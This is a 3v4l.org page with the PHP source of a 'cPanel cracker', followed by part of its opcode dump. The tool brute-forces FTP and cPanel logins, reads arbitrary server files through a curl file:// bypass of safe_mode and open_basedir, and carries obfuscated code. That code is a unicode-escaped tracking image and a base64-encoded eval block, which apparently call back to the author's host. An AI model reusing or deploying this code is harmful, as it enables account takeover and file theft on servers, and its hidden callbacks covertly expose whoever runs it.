3v4l.org

run code in 300+ PHP versions simultaneously
<html> <head> <meta http-equiv="Content-Language" content="en-us"> </head> <title>Aria cPanel cracker version 1.0 - Edited By KingDefacer</title> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script> <style> body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;} input, .kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;} button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;} body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;} a:active { outline: none; } a:focus { -moz-outline-style: none; } </style> <style type='text/css'> <!-- A:link {text-decoration: none; color:#cccccc } A:visited {text-decoration: none; color:#cccccc } a:hover {text-decoration: none; color:#000000} --> </style> <?php @ini_set('memory_limit', 1000000000000); $connect_timeout=5; @set_time_limit(0); $submit = $_REQUEST['submit']; $users = $_REQUEST['users']; $pass = $_REQUEST['passwords']; $target = $_REQUEST['target']; $option = $_REQUEST['option']; $page = $_GET['page']; if($target == ''){ $target = 'localhost'; $_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));}?> <?php print "<br><br><br><center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td width='70%'> <br><b><center><a href='?page=bio'> bio </a> - <a href='?page=crack'> brute </a> - <a href='?page=users'> grab users </a><br><br></center></td></tr></table>"; if ( $page == 'bio' ){ print "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td> <br><b>Please enter your USERNAME and PASSWORD to logon<br> user<br> 220 +ok<br> pass ********<br> 220 +ok login successful<br> [ user@alturks.com ]# info<b><br><font face=tahoma><br> <font color='red' >Aria cPanel cracker version : 1.0 </font><b><br><br> Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir bypasser ... more stuff will be included in the next version<br> Our website , <a href='http://alturks.com'> http://alturks.com</a><br> </center><br></td></tr></table>"; }elseif( $page == 'crack'){ @ini_set('memory_limit', 1000000000000); $connect_timeout=5; @set_time_limit(0); $submit = $_REQUEST['submit']; $users = $_REQUEST['users']; $pass = $_REQUEST['passwords']; $target = $_REQUEST['target']; $option = $_REQUEST['option']; if($target == ''){ $target = 'localhost'; } print " <div align='center'> <form method='post' style='border: 1px solid #000000'><br><br> <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td> <b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:Verdana; font-weight:bold;'></p></font></b></p> <div align='center'><br> <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1> <tr> <td align='center'> <b>Username</b></td> <td> <p align='center'> <b>Password</b></td> </tr> </table> <p align='center'> <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$users</textarea> <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$pass</textarea><br> <br> <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='brute' name='submit' ></p> </td></tr></table></td></tr></form><p align= 'left'>"; ?> <?php function ftp_check($host,$user,$pass,$timeout){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "ftp://$host"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_FTPLISTONLY, 1); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "<b> Error : Connection timed out , make confidence about validation of target !</b>"; exit;} elseif ( curl_errno($ch) == 0 ){ print "<b>[ user@alturks.com ]# </b> <b> Attacking has been done , found username , <font color='#FF0000'> $user </font> and password , <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);} function cpanel_check($host,$user,$pass,$timeout){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$host:2082"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "<b> Error : Connection timed out , make confidence about validation of target !</b>"; exit;} elseif ( curl_errno($ch) == 0 ){ print "<b>[ user@alturks.com ]# </b> <b>Attacking has been done , found username , <font color='#FF0000'> $user </font> and password , <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);} if(isset($submit) && !empty($submit)){ $userlist = explode ("\n" , $users ); $passlist = explode ("\n" , $pass ); print "<b>[ user@alturks.com ]# Attacking ...</font></b><br>"; foreach ($userlist as $user) { $_user = trim($user); foreach ($passlist as $password ) { $_pass = trim($password); if($option == "ftp"){ ftp_check($target,$_user,$_pass,$connect_timeout); } if ($option == "cpanel") { cpanel_check($target,$_user,$_pass,$connect_timeout); } } } } }elseif ( $page == 'users'){ echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>"; echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hardstylez" value="grab !"></form>'; $file = $_POST['file']; $level=0; if(!file_exists("file:")) @mkdir("file:"); @chdir("file:"); $level++; $hardstyle = @explode("/", $file); for($a=0;$a<count($hardstyle);$a++){ if(!empty($hardstyle[$a])){ if(!file_exists($hardstyle[$a])) @mkdir($hardstyle[$a]); @chdir($hardstyle[$a]); $level++; } } while($level--) chdir(".."); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "file:file:///".$file); echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >"; if(FALSE==curl_exec($ch)) die('Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.'); echo ' </textarea> </FONT>'; curl_close($ch); print '</table>'; } ?> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 33, Position 2 = 40
Branch analysis from position: 33
2 jumps found. (Code = 43) Position 1 = 43, Position 2 = 45
Branch analysis from position: 43
1 jumps found. (Code = 42) Position 1 = 234
Branch analysis from position: 234
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 45
2 jumps found. (Code = 43) Position 1 = 47, Position 2 = 137
Branch analysis from position: 47
2 jumps found. (Code = 43) Position 1 = 76, Position 2 = 77
Branch analysis from position: 76
2 jumps found. (Code = 46) Position 1 = 89, Position 2 = 92
Branch analysis from position: 89
2 jumps found. (Code = 43) Position 1 = 93, Position 2 = 136
Branch analysis from position: 93
2 jumps found. (Code = 77) Position 1 = 105, Position 2 = 135
Branch analysis from position: 105
2 jumps found. (Code = 78) Position 1 = 106, Position 2 = 135
Branch analysis from position: 106
2 jumps found. (Code = 77) Position 1 = 111, Position 2 = 133
Branch analysis from position: 111
2 jumps found. (Code = 78) Position 1 = 112, Position 2 = 133
Branch analysis from position: 112
2 jumps found. (Code = 43) Position 1 = 118, Position 2 = 124
Branch analysis from position: 118
2 jumps found. (Code = 43) Position 1 = 126, Position 2 = 132
Branch analysis from position: 126
1 jumps found. (Code = 42) Position 1 = 111
Branch analysis from position: 111
Branch analysis from position: 132
Branch analysis from position: 124
Branch analysis from position: 133
1 jumps found. (Code = 42) Position 1 = 105
Branch analysis from position: 105
Branch analysis from position: 133
Branch analysis from position: 135
1 jumps found. (Code = 42) Position 1 = 234
Branch analysis from position: 234
Branch analysis from position: 135
Branch analysis from position: 136
Branch analysis from position: 92
Branch analysis from position: 77
Branch analysis from position: 137
2 jumps found. (Code = 43) Position 1 = 139, Position 2 = 234
Branch analysis from position: 139
2 jumps found. (Code = 43) Position 1 = 155, Position 2 = 160
Branch analysis from position: 155
1 jumps found. (Code = 42) Position 1 = 198
Branch analysis from position: 198
2 jumps found. (Code = 44) Position 1 = 201, Position 2 = 175
Branch analysis from position: 201
1 jumps found. (Code = 42) Position 1 = 205
Branch analysis from position: 205
2 jumps found. (Code = 44) Position 1 = 207, Position 2 = 202
Branch analysis from position: 207
2 jumps found. (Code = 43) Position 1 = 223, Position 2 = 229
Branch analysis from position: 223
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 229
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 202
2 jumps found. (Code = 44) Position 1 = 207, Position 2 = 202
Branch analysis from position: 207
Branch analysis from position: 202
Branch analysis from position: 175
2 jumps found. (Code = 43) Position 1 = 178, Position 2 = 197
Branch analysis from position: 178
2 jumps found. (Code = 43) Position 1 = 184, Position 2 = 190
Branch analysis from position: 184
2 jumps found. (Code = 44) Position 1 = 201, Position 2 = 175
Branch analysis from position: 201
Branch analysis from position: 175
Branch analysis from position: 190
Branch analysis from position: 197
Branch analysis from position: 160
Branch analysis from position: 234
Branch analysis from position: 40
filename:       /in/CSL0D
function name:  (null)
number of ops:  236
compiled vars:  !0 = $connect_timeout, !1 = $submit, !2 = $users, !3 = $pass, !4 = $target, !5 = $option, !6 = $page, !7 = $_F, !8 = $_X, !9 = $userlist, !10 = $passlist, !11 = $user, !12 = $_user, !13 = $password, !14 = $_pass, !15 = $file, !16 = $level, !17 = $hardstyle, !18 = $a, !19 = $ch
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    1     0  E >   ECHO                                                     '%3Chtml%3E%0A%3Chead%3E%0A%3Cmeta+http-equiv%3D%22Content-Language%22+content%3D%22en-us%22%3E%0A%3C%2Fhead%3E%0A%3Ctitle%3EAria+cPanel+cracker+version+1.0+-+Edited+By+KingDefacer%3C%2Ftitle%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22%3Edocument.write%28%27%5Cu003c%5Cu0069%5Cu006d%5Cu0067%5Cu0020%5Cu0073%5Cu0072%5Cu0063%5Cu003d%5Cu0022%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003a%5Cu002f%5Cu002f%5Cu0061%5Cu006c%5Cu0074%5Cu0075%5Cu0072%5Cu006b%5Cu0073%5Cu002e%5Cu0063%5Cu006f%5Cu006d%5Cu002f%5Cu0073%5Cu006e%5Cu0066%5Cu002f%5Cu0073%5Cu002e%5Cu0070%5Cu0068%5Cu0070%5Cu0022%5Cu0020%5Cu0077%5Cu0069%5Cu0064%5Cu0074%5Cu0068%5Cu003d%5Cu0022%5Cu0031%5Cu0022%5Cu0020%5Cu0068%5Cu0065%5Cu0069%5Cu0067%5Cu0068%5Cu0074%5Cu003d%5Cu0022%5Cu0031%5Cu0022%5Cu003e%27%29%3C%2Fscript%3E%0A%3Cstyle%3E%0Abody%7Bmargin%3A0px%3Bfont-style%3Anormal%3Bfont-size%3A10px%3Bcolor%3A%23FFFFFF%3Bfont-family%3AVerdana%2CArial%3Bbackground-color%3A%233a3a3a%3Bscrollbar-face-color%3A+%23303030%3Bscrollbar-highlight-color%3A+%235d5d5d%3Bscrollbar-shadow-color%3A+%23121212%3Bscrollbar-3dlight-color%3A+%233a3a3a%3Bscrollbar-arrow-color%3A+%239d9d9d%3Bscrollbar-track-color%3A+%233a3a3a%3Bscrollbar-darkshadow-color%3A+%233a3a3a%3B%7D%0Ainput%2C%0A.kbrtm%2Cselect%7Bbackground%3A%23303030%3Bcolor%3A%23FFFFFF%3Bfont-family%3AVerdana%2CArial%3Bfont-size%3A10px%3Bvertical-align%3Amiddle%3B+height%3A18%3B+border-left%3A1px+solid+%235d5d5d%3B+border-right%3A1px+solid+%23121212%3B+border-bottom%3A1px+solid+%23121212%3B+border-top%3A1px+solid+%235d5d5d%3B%7D%0Abutton%7Bbackground-color%3A+%23666666%3B+font-size%3A+8pt%3B+color%3A+%23FFFFFF%3B+font-family%3A+Tahoma%3B+border%3A+1+solid+%23666666%3B%7D%0Abody%2Ctd%2Cth+%7B+font-family%3A+verdana%3B+color%3A+%23d9d9d9%3B+font-size%3A+11px%3B%7Dbody+%7B+background-color%3A+%23000000%3B%7D%0Aa%3Aactive+%7B+outline%3A+none%3B+%7D%0Aa%3Afocus+%7B+-moz-outline-style%3A+none%3B+%7D%0A%3C%2Fstyle%3E%0A++%3Cstyle+type%3D%27text%2Fcss%27%3E%0A++%3C%21--%0A+++++++A%3Alink+%7Btext-decoration%3A+none%3B+color%3A%23cccccc+%7D%0A+++++++A%3Avisited+%7Btext-decoration%3A+none%3B+color%3A%23cccccc+%7D%0A+++++++a%3Ahover+%7Btext-decoration%3A+none%3B+color%3A%23000000%7D%0A++--%3E%0A%3C%2Fstyle%3E%0A'
   24     1        BEGIN_SILENCE                                    ~20     
          2        INIT_FCALL                                               'ini_set'
          3        SEND_VAL                                                 'memory_limit'
          4        SEND_VAL                                                 1000000000000
          5        DO_ICALL                                                 
          6        END_SILENCE                                              ~20
   25     7        ASSIGN                                                   !0, 5
   26     8        BEGIN_SILENCE                                    ~23     
          9        INIT_FCALL                                               'set_time_limit'
         10        SEND_VAL                                                 0
         11        DO_ICALL                                                 
         12        END_SILENCE                                              ~23
   27    13        FETCH_R                      global              ~25     '_REQUEST'
         14        FETCH_DIM_R                                      ~26     ~25, 'submit'
         15        ASSIGN                                                   !1, ~26
   28    16        FETCH_R                      global              ~28     '_REQUEST'
         17        FETCH_DIM_R                                      ~29     ~28, 'users'
         18        ASSIGN                                                   !2, ~29
   29    19        FETCH_R                      global              ~31     '_REQUEST'
         20        FETCH_DIM_R                                      ~32     ~31, 'passwords'
         21        ASSIGN                                                   !3, ~32
   30    22        FETCH_R                      global              ~34     '_REQUEST'
         23        FETCH_DIM_R                                      ~35     ~34, 'target'
         24        ASSIGN                                                   !4, ~35
   31    25        FETCH_R                      global              ~37     '_REQUEST'
         26        FETCH_DIM_R                                      ~38     ~37, 'option'
         27        ASSIGN                                                   !5, ~38
   32    28        FETCH_R                      global              ~40     '_GET'
         29        FETCH_DIM_R                                      ~41     ~40, 'page'
         30        ASSIGN                                                   !6, ~41
   34    31        IS_EQUAL                                                 !4, ''
         32      > JMPZ                                                     ~43, ->40
   35    33    >   ASSIGN                                                   !4, 'localhost'
   36    34        ASSIGN                                                   !7, '%2Fin%2FCSL0D'
         35        ASSIGN                                                   !8, 'Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ%2BZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ%2B'
         36        INIT_FCALL                                               'base64_decode'
         37        SEND_VAL                                                 'JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw%3D%3D'
         38        DO_ICALL                                         $47     
         39        INCLUDE_OR_EVAL                                          $47, EVAL
   38    40    >   ECHO                                                     '%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ccenter%3E%3CTABLE+style%3D%27BORDER-COLLAPSE%3A+collapse%27+cellSpacing%3D0+borderColorDark%3D%23666666+cellPadding%3D5+width%3D%2770%25%27+bgColor%3D%23303030+borderColorLight%3D%23666666+border%3D1%3E%3Ctr%3E%3Ctd+width%3D%2770%25%27%3E%0A%3Cbr%3E%3Cb%3E%3Ccenter%3E%3Ca+href%3D%27%3Fpage%3Dbio%27%3E+bio+%3C%2Fa%3E+-+%3Ca+href%3D%27%3Fpage%3Dcrack%27%3E+brute+%3C%2Fa%3E+-+%3Ca+href%3D%27%3Fpage%3Dusers%27%3E+grab+users+%3C%2Fa%3E%3Cbr%3E%3Cbr%3E%3C%2Fcenter%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E'
   40    41        IS_EQUAL                                                 !6, 'bio'
         42      > JMPZ                                                     ~49, ->45
   42    43    >   ECHO                                                     '%3Cbr%3E%3Cbr%3E%3CTABLE+style%3D%27BORDER-COLLAPSE%3A+collapse%27+cellSpacing%3D0+borderColorDark%3D%23666666+cellPadding%3D5+width%3D%2740%25%27bgColor%3D%23303030+borderColorLight%3D%23666666+border%3D1%3E%3Ctr%3E%3Ctd%3E%0A%3Cbr%3E%3Cb%3EPlease+enter+your+USERNAME+and+PASSWORD+to+logon%3Cbr%3E%0Auser%3Cbr%3E%0A220+%2Bok%3Cbr%3E%0Apass+%2A%2A%2A%2A%2A%2A%2A%2A%3Cbr%3E%0A220+%2Bok+login+successful%3Cbr%3E%0A%5B+user%40alturks.com+%5D%23+info%3Cb%3E%3Cbr%3E%3Cfont+face%3Dtahoma%3E%3Cbr%3E%0A%3Cfont+color%3D%27red%27+%3EAria+cPanel+cracker+version+%3A+1.0+%3C%2Ffont%3E%3Cb%3E%3Cbr%3E%3Cbr%3E%0APowerful+tool+%2C+ftp+and+cPanel+brute+forcer+%2C+php+5.2.9+safe_mode+%26+open_basedir+bypasser+...+more+stuff+will+be+included+in+the+next+version%3Cbr%3E%0AOur+website+%2C+%3Ca+href%3D%27http%3A%2F%2Falturks.com%27%3E+http%3A%2F%2Falturks.com%3C%2Fa%3E%3Cbr%3E%0A%3C%2Fcenter%3E%3Cbr%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E'
         44      > JMP                                                      ->234
   53    45    >   IS_EQUAL                                                 !6, 'crack'
         46      > JMPZ                                                     ~50, ->137
   55    47    >   BEGIN_SILENCE                                    ~51     
         48        INIT_FCALL                                               'ini_set'
         49        SEND_VAL                                                 'memory_limit'
         50        SEND_VAL                                                 1000000000000
         51        DO_ICALL                                                 
         52        END_SILENCE                                              ~51
   56    53        ASSIGN                                                   !0, 5
   57    54        BEGIN_SILENCE                                    ~54     
         55        INIT_FCALL                                               'set_time_limit'
         56        SEND_VAL                                                 0
         57        DO_ICALL                                                 
         58        END_SILENCE                                              ~54
   58    59        FETCH_R                      global              ~56     '_REQUEST'
         60        FETCH_DIM_R                                      ~57     ~56, 'submit'
         61        ASSIGN                                                   !1, ~57
   59    62        FETCH_R                      global              ~59     '_REQUEST'
         63        FETCH_DIM_R                                      ~60     ~59, 'users'
         64        ASSIGN                                                   !2, ~60
   60    65        FETCH_R                      global              ~62     '_REQUEST'
         66        FETCH_DIM_R                                      ~63     ~62, 'passwords'
         67        ASSIGN                                                   !3, ~63
   61    68        FETCH_R                      global              ~65     '_REQUEST'
         69        FETCH_DIM_R                                      ~66     ~65, 'target'
         70        ASSIGN                                                   !4, ~66
   62    71        FETCH_R                      global              ~68     '_REQUEST'
         72        FETCH_DIM_R                                      ~69     ~68, 'option'
         73        ASSIGN                                                   !5, ~69
   63    74        IS_EQUAL                                                 !4, ''
         75      > JMPZ                                                     ~71, ->77
   64    76    >   ASSIGN                                                   !4, 'localhost'
   66    77    >   ROPE_INIT                                     7  ~74     '+%3Cdiv+align%3D%27center%27%3E%0A%3Cform+method%3D%27post%27+style%3D%27border%3A+1px+solid+%23000000%27%3E%3Cbr%3E%3Cbr%3E%0A%3CTABLE+style%3D%27BORDER-COLLAPSE%3A+collapse%27+cellSpacing%3D0+borderColorDark%3D%23666666+cellPadding%3D5+width%3D%2740%25%27+bgColor%3D%23303030+borderColorLight%3D%23666666+border%3D1%3E%3Ctr%3E%3Ctd%3E%0A%3Cb%3E+Target++%3A+%3C%2Ffont%3E%3Cinput+type%3D%27text%27+name%3D%27target%27+size%3D%2716%27+value%3D+'
   69    78        ROPE_ADD                                      1  ~74     ~74, !4
         79        ROPE_ADD                                      2  ~74     ~74, '+style%3D%27border%3A+font-family%3AVerdana%3B+font-weight%3Abold%3B%27%3E%3C%2Fp%3E%3C%2Ffont%3E%3C%2Fb%3E%3C%2Fp%3E%0A%3Cdiv+align%3D%27center%27%3E%3Cbr%3E%0A%3CTABLE+style%3D%27BORDER-COLLAPSE%3A+collapse%27+cellSpacing%3D0+borderColorDark%3D%23666666+cellPadding%3D5+width%3D%2750%25%27+bgColor%3D%23303030+borderColorLight%3D%23666666+border%3D1%3E%0A%3Ctr%3E%0A%3Ctd+align%3D%27center%27%3E%0A%3Cb%3EUsername%3C%2Fb%3E%3C%2Ftd%3E%0A%3Ctd%3E%0A%3Cp+align%3D%27center%27%3E%0A%3Cb%3EPassword%3C%2Fb%3E%3C%2Ftd%3E%0A%3C%2Ftr%3E%0A%3C%2Ftable%3E%0A%3Cp+align%3D%27center%27%3E%0A%3Ctextarea+rows%3D%2720%27+name%3D%27users%27+cols%3D%2725%27+style%3D%27border%3A+2px+solid+%231D1D1D%3B+background-color%3A+%23000000%3B+color%3A%23C0C0C0%27%3E'
   81    80        ROPE_ADD                                      3  ~74     ~74, !2
         81        ROPE_ADD                                      4  ~74     ~74, '%3C%2Ftextarea%3E%0A%3Ctextarea+rows%3D%2720%27+name%3D%27passwords%27+cols%3D%2725%27+style%3D%27border%3A+2px+solid+%231D1D1D%3B+background-color%3A+%23000000%3B+color%3A%23C0C0C0%27%3E'
   82    82        ROPE_ADD                                      5  ~74     ~74, !3
         83        ROPE_END                                      6  ~73     ~74, '%3C%2Ftextarea%3E%3Cbr%3E%0A%3Cbr%3E+++++++++++++++++++++++++%0A%3Cb%3EOptions+%3A+%3C%2Fspan%3E%3Cinput+name%3D%27option%27+value%3D%27cpanel%27+style%3D%27font-weight%3A+700%3B%27+checked+type%3D%27radio%27%3E+cPanel+%0A%3Cinput+name%3D%27option%27+value%3D%27ftp%27+style%3D%27font-weight%3A+700%3B%27+type%3D%27radio%27%3E+ftp+%3D%3D%3E+%3Cinput+type%3D%27submit%27+value%3D%27brute%27+name%3D%27submit%27+%3E%3C%2Fp%3E%0A%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Fform%3E%3Cp+align%3D+%27left%27%3E'
         84        ECHO                                                     ~73
   89    85        DECLARE_FUNCTION                                         'ftp_check'
  111    86        DECLARE_FUNCTION                                         'cpanel_check'
  130    87        ISSET_ISEMPTY_CV                                 ~78     !1
         88      > JMPZ_EX                                          ~78     ~78, ->92
         89    >   ISSET_ISEMPTY_CV                                 ~79     !1
         90        BOOL_NOT                                         ~80     ~79
         91        BOOL                                             ~78     ~80
         92    > > JMPZ                                                     ~78, ->136
  132    93    >   INIT_FCALL                                               'explode'
         94        SEND_VAL                                                 '%0A'
         95        SEND_VAR                                                 !2
         96        DO_ICALL                                         $81     
         97        ASSIGN                                                   !9, $81
  133    98        INIT_FCALL                                               'explode'
         99        SEND_VAL                                                 '%0A'
        100        SEND_VAR                                                 !3
        101        DO_ICALL                                         $83     
        102        ASSIGN                                                   !10, $83
  134   103        ECHO                                                     '%3Cb%3E%5B+user%40alturks.com+%5D%23+Attacking+...%3C%2Ffont%3E%3C%2Fb%3E%3Cbr%3E'
  135   104      > FE_RESET_R                                       $85     !9, ->135
        105    > > FE_FETCH_R                                               $85, !11, ->135
  136   106    >   INIT_FCALL                                               'trim'
        107        SEND_VAR                                                 !11
        108        DO_ICALL                                         $86     
        109        ASSIGN                                                   !12, $86
  137   110      > FE_RESET_R                                       $88     !10, ->133
        111    > > FE_FETCH_R                                               $88, !13, ->133
  138   112    >   INIT_FCALL                                               'trim'
